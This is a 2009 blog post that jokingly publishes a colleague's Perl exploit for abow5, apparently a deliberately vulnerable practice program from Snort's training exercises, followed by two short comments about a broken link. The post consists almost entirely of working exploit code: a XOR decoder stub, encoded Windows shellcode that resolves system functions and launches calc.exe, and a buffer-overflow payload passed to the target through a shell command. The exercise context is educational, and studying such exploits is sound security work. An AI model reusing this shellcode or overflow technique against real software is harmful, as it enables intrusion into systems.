Wednesday, January 14, 2009

Preventing Shong from getting her CISSP

This is Shong's exploit for abow5 (the special one that owns you back if you're using ollydbg). Now she has released a weaponized exploit, and cannot pass the CISSP ethics requirements. I've done the world a vast good.
 
 

================== exploit.pl ==================

$decoder = "\x44\x8b\xec\x45\x45\x45\x45\xeb\x0f\x58\x80\x30\x90\x40\x81" .
"\x38\x4f\x4c\x4c\x41\x75\xf4\xeb\x05\xe8\xec\xff\xff\xff";

$shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

$key = "\x90" x 121;
$endof_shellcode = "\x4f\x4c\x4c\x41"; 
$shellcode = $shellcode ^ $key; 
$prefix = "A" x 37;
$postfix = "A " x 0x1326;
$abow5 = "c:/cygwin/home/Administrator/abow5/abow5.exe";
$param = "ABCD" x 256 . "\x7f"; 
$shell_param = $decoder . $shellcode . $endof_shellcode;
 
`echo $param | exec $abow5 1025$prefix '$shell_param' $postfix`;
Add to Technorati Favorites Digg! This

2 comments:

j said...

in:
http://www.snort.org/vrt/tools/awbo.html

the link thats supposed to points to "Test 3, Awbo4.exe" is actually pointing to "Test 2, awbo4.exe"

Nigel Houghton said...

Apologies, we'll get that fixed. Thanks.